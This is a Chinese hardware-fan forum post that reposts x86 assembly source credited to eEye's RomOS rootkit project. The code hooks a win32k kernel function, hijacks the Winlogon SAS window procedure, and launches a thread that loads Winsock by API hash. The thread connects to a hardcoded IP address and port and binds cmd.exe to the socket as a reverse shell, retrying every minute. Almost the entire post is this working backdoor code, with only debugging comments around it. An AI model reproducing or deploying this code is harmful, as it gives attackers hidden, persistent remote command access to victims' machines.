马上注册,结交更多Acer基友,欣赏海量Acer专属模特美图,免费获取最新Acer潮酷新品试用,Get更多发烧级玩家技能,享受更多网站功能与会员福利,还有定期好礼大奖免费送,会员专属优惠购机。QQ群号:113958420
您需要 登录 才可以下载或查看,没有帐号?限时注册
x
本帖最后由 demon 于 2015-8-13 13:12 编辑
;*****************************************************************************************************************************************MyNtUserRegisterClassExWOW: ;win32k!NtUserRegisterClassExWOW HOOK .
pushad ;bochs调试10#:lb 0xffdf091e 调试9#获取.
;使用bochs调试命令:x esp u /50 eip.
xor eax,eax
push (CSL_KERNEL_DEST + (MyNtUserRegisterClassExWOW_SEH - Code32Start))
push dword ptr fs:[eax] ;在堆栈建立异常结构
mov dword ptr fs:[eax],esp ;安装我们的异常处理,####调试发现安装的异常处理有时不能工作.####
;通过传来的参数检查类名是L"SAS window class" ,替换其'lpfnWndProc'过程,具体参看"win32应用程序窗口消息原理".
mov ebp,ds:[7FFE02B4h] ;EBP = MmHighestUserAddress
mov edx,[esp + 8 + 28h] ;edx->窗口类名,格式PUNICODE_STRING.
.if edx <= ebp
.if word ptr [edx] == 16*2 ;size of L"SAS window class" 检查字符数对不?
mov esi,[edx + 4]
.if esi <= ebp
mov ecx,16 ;
mov edx,72ABEC2Dh ;72ABEC2Dh <-- HASH("SAS window class")
@@:
lodsw
sub edx,eax
ror edx,7
loop @B
.if edx == 0 ;替换窗口过程,前保存旧的过程在PEB中
mov esi,[esp + 8 +24h];esi->WNDCLASSEXW 类结构.
.if esi <= ebp
mov ecx,fs:[edx + 18h] ;ecx->用户TIB,线程信息块存放线程信息.
mov ecx,[ecx +30h] ;ecx-> PEB,进程环境块存放进程信息.
.if ecx <= ebp ;bochs调试11#:lb 0xffdf0971
mov eax,(CSL_USER_BACKDOOR + (MySASWndProc - Code32Start))
xchg dword ptr [esi + 8],eax ;替换'lpfnWndProc'过程,为我们的过程.
mov [ecx + 0eb0h],eax EB->0EB0h = 旧的'lpfnWndProc' (保存旧的SASWndProc)
.endif
.endif
.endif
.endif
.endif
.endif
;*****************************************************************************************************************************************NTURCEWOW_Done: ;bochs调试11#:lb 0xffdf097f
xor eax,eax
pop dword ptr fs:[eax] ;移除堆栈的异常结构
pop ecx ;移除我们的异常处理
popad
pushd 0
NTURCEWOW_ORIGINAL EQU $-4
ret ;返回NtUserRegisterClassExWOWHook执行.
;*****************************************************************************************************************************************MyNtUserRegisterClassExWOW_SEH: ;注意:安装异常参看"win32应用程序设计".
xor eax,eax ;lb 0xffdf098c 调试异常:兼容不很稳定 .
cdq ;CDQ常用于除法运算之前调整EDX值.作用只是把EDX的所有位都设成EAX最高位的值.
mov dl,0B8h
add edx,[esp + 0Ch] ;[esp + c]->Context.传过来的参数.
;Context->Eip
mov dword ptr [edx],(CSL_KERNEL_DEST + (NTURCEWOW_Done - Code32Start))
ret
;*****************************************************************************************************************************************MySASWndProc: ;bochs调试12#: 程序现已运行在应用层下.
;lb 0x7ffe099c
push eax ;eax:旧的SASWndProc地址,返回方法:popad ret.
pushad
xor eax,eax
mov edx,fs:[eax+30h] ;ptr to PEB
mov eax,[edx+0EB0h] ;original SASWndProc address
mov [esp+20h],eax
mov eax,[esp+2Ch] ;get 'uMsg' argument
.if eax == 0001h ;WM_CREATE
mov eax,[edx+0Ch] ;ptr to loader data
mov ecx,[eax+1Ch] ;ptr to first module in initialization-order list
.repeat
mov ebx,[ecx+8] ;module image base
mov esi,[ecx+20h] ;ptr to module file name
mov ecx,[ecx] ;ptr to next module
lodsb
or al,20h
.until al == 'k' ;assume KERNEL32.DLL will be first module starting with 'K'
;EBX = KERNEL32 镜像基址 bochs调试13#:lb 0x7ffe09cc
;mov edi,(CSL_USER_BACKDOOR + (PEApiHashFind - Code32Start))
push ebx ;ebx:dwThreadID 变量使用堆栈.
push esp ;push addr dwThreadID
push 0
push 0
push (CSL_USER_BACKDOOR + (TelnetShell - Code32Start))
push 0
push 0
mov edx,3f1764e5h ;hash("CreateThread")=3f1764e5h
call PEApiHashFind ;call edi 是否需要这样调用?
call eax ;invoke CreateThread,NULL,0,offset TelnetShell,NULL,NULL,addr dwThreadID
pop ebx ;ebx:dwThreadID 去掉变量使用.
.endif
popad
ret ;invoke original SASWndProc
;*****************************************************************************************************************************************TelnetShell: ;可用于安装在win2k/xp/2003 反向连接Telnet后门应用程序.
xor eax,eax ;bochs调试14#:lb 0x7ffe09f0
mov edx,fs:[eax+30h] ;ptr to PEB
mov eax,[edx+0Ch] ;ptr to loader data
mov ecx,[eax+1Ch] ;ptr to first module in initialization-order list
.repeat
mov ebx,[ecx+8] ;module image base
mov esi,[ecx+20h] ;ptr to module file name
mov ecx,[ecx] ;ptr to next module
lodsb
or al,20h
.until al == 'k' ;assume KERNEL32.DLL will be first module starting with 'K'
;EBX = KERNEL32 image base
mov edi,ebx ;edi = kernel32基址 bochs调试15#:lb 0x7ffe0a05
TelnetShell_Strat:
mov ebp,esp ;bochs调试15#:lb 0x7ffe0a07
push 00003233h
push 5f325357h ;esp->"WS2_32"
push esp
mov edx,2e864192h ;Hash("LoadLibraryA")=2e864192h
call PEApiHashFind
call eax ;LoadLibraryA(&WS2_32DLL)返回EAX=装载DLL基址.
mov ebx,eax ;ebx=WS2_32基址
sub esp,1ech ;WSADATA struct
push esp ;esp->WSADATA struct
push 202h ;VersionRequested 0x202h
mov edx,0c05a351eh ;Hash("WSAStartup")=0c05a351eh
call PEApiHashFind
call eax ;WSAStartup(0x101, &WSADATA)
push 0
push 0
push 0
push 6 ;IPPROTO_TCP=6 IPPROTO_UDP=17
push 1 ;SOCK_STREAM=1 SOCK_DGRAM=2
push 2 ;AF_INET=2
mov edx,0ef3c1916h ;Hash("WSASocketA")=0ef3c1916h
call PEApiHashFind
call eax ;s=WSASocketA(2,1,6,0,0,0)
mov esi,eax ;esi=socket s
push 0265359dah ;sockaddr_in.sin_addr;192.168.100.111(06f64a8c0h)
push 0feff0002h ;0x02=AF_INET(sin_family);0xfffe=65534(sin_port)
;.repeat
mov edx,esp
push 10h ;sizeof(sockaddr_in)
push edx ;esp->sockaddr_in struct
push esi ;socket s
mov edx,5ddd8b01h ;Hash("connect")=5ddd8b01h
;mov ebx,edi ;ebx=kernel32基址
call PEApiHashFind
call eax ;IPPROTO_TCP c=connect(s, &address, sizeof(address))
;.until eax == 0 ;连接成功
mov ebx,edi ;ebx=kernel32基址
.if eax != 0
push 60000
mov edx,0cb9765ah ;Hash("Sleep")=0cb9765ah
call PEApiHashFind
call eax ;invoke Sleep,60000
mov esp,ebp
mov ebx,edi ;ebx=kernel32基址
jmp TelnetShell_Strat ;for another connection
;ret
.endif
push 646d63h ;winNT(cmd.exe)
mov edx,esp ;edx->file name
push esi ;STARTUPINFOA.hStdError
push esi ;STARTUPINFOA.hStdOutput
push esi ;STARTUPINFOA.hStdInput
push 0
push 0 ;wShowWindow cbReserved2
push 101h ;STARTUPINFO.dwFlags
mov ecx,0fh
@@:
push 0 ;STARTUPINFOA.cb ~ STARTUPINFOA.dwFillAttribute
loop @B
lea ecx,[esp+10h] ;ecx->STARTUPINFOA.cb
mov dword ptr [ecx],44h ;STARTUPINFOA.CB=44h(len STARTUPINFOA)
push esp ;esp->ROCESS_INFORMATION STRUCT(all 0)
push ecx ;ecx->STARTUPINFOA STRUCT
push 0
push 0
push 0
push 1
push 0
push 0
push edx
push 0
mov edx,4b5d35e6h ;Hash("CreateProcessA")=4b5d35e6h
call PEApiHashFind
call eax ;CreateProcessA(0, Addr"cmd.exe",0,0,1,0,0,0,si, pi)
pop ecx ROCESS_INFORMATION.hProcess
push -1 ;time -1
push ecx
mov edx,8885abf2h ;Hash("WaitForSingleObject")=8885abf2h
call PEApiHashFind
call eax ;WaitForSingleObject(Handle, time)
mov esp,ebp
mov ebx,edi ;ebx=kernel32基址
jmp TelnetShell_Strat ;for another connection
;ret
;*****************************************************************************************************************************************PEApiHashFind: ;入口:EBX=镜像基址 EDX=HASH32值 出口:eax=Api 地址,0表示未找到.
xor eax,eax
pushad
mov ecx,[ebx+3Ch] ;ecx = RVA of PE header
mov ebp,[ebx+ecx+78h] ;ebp = RVA of export directory
add ebp,ebx ;ebp -> ptr to export directory
mov ecx,[ebp+18h] ;ecx = IMAGE_EXPORT_DIRECTORY::NumberOfNames
mov edi,[ebp+20h] ;edi -> IMAGE_EXPORT_DIRECTORY::AddressOfNames
add edi,ebx
.while ecx > 0
dec ecx
mov esi,[edi+ecx*4]
add esi,ebx ;esi->API字符串在内存物理地址.
push edx
.repeat
lodsb
sub edx,eax
ror edx,7
.until eax == 0 ;字符结束
.if edx == 0
pop edx
.break
.endif
pop edx
.endw
.if ecx > 0
mov edx,[ebp+024h]
add edx,ebx ;AddressofOrdinals
mov cx,[edx+ecx*2]
mov eax,[ebp+01ch]
add eax,ebx ;AddressOfFunctions
add ebx,[eax+ecx*4]
mov [esp+1Ch], ebx ;overwrite saved EAX with ptr to export
.endif
popad
ret
;*****************************************************************************************************************************************Code32End: ;感谢: eEye RootKit RomOS开源项目
<<<<<<<<<<<<<<<<<图文转自网络,如有版权问题请联系删除》》》》》》》》》》》》》》》 |
|